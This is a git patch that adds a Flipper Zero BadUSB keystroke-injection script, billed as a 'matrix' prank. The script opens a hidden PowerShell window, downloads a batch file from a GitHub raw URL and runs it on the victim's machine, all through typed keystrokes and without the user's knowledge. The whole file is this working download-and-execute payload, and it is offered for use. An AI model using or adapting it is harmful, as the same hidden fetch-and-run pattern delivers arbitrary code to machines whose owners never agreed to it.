From 16ed6a1606c38f84c0509b90b55acbc5fa490faf Mon Sep 17 00:00:00 2001 From: Yann <30565751+SeenKid@users.noreply.github.com> Date: Wed, 5 Apr 2023 13:44:07 +0200 Subject: [PATCH] Add files via upload --- windows10/matrix ps hidden.txt | 12 ++++++++++++ 1 file changed, 12 insertions(+) create mode 100644 windows10/matrix ps hidden.txt diff --git a/windows10/matrix ps hidden.txt b/windows10/matrix ps hidden.txt new file mode 100644 index 0000000..2c1ad9d --- /dev/null +++ b/windows10/matrix ps hidden.txt @@ -0,0 +1,12 @@ +REM Author: SeenKid (seenkid#1337 on Discord) +REM Description: Starts a matrix command prompt +REM Version: 1.0 +DELAY 500 +GUI r +DELAY 900 +STRING powershell -windowstyle hidden +ENTER +DELAY 900 +STRING $DesktopPath = [Environment]::GetFolderPath("Desktop"); Invoke-WebRequest -Uri https://raw.githubusercontent.com/SeenKid/flipper-zero-bad-usb/main/utils/files/matrix.bat -OutFile "$DesktopPath/matrix.bat"; Start-Process "cmd.exe" "/c $DesktopPath/matrix.bat;" +DELAY 200 +ENTER \ No newline at end of file